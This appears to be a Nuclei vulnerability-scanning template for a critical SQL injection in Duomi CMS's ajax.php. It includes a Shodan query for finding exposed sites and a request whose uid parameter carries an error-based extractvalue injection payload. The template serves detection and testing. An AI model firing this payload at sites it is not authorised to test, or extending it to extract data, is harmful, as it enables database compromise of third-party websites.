id: duomicms-sql-injection info: name: Duomi CMS - SQL Injection author: pikpikcu severity: critical description: Duomi CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://redn3ck.github.io/2016/11/01/duomiCMS/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 metadata: verified: true max-request: 1 shodan-query: title:"DuomiCMS" tags: duomicms,sqli variables: num: "999999999" http: - method: GET path: - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))" matchers-condition: and matchers: - type: word words: - '{{md5({{num}})}}' - type: status status: - 200 # digest: 4a0a004730450220112a5ca288424ba70d536e63d8554436806074bd2fa35687177e0c25746c46b8022100f0014606898d12c5f5a7223bc521af8f75e6a398ef53788af0bc4c7eba211633:922c64590222798bb761d5b6d8e72950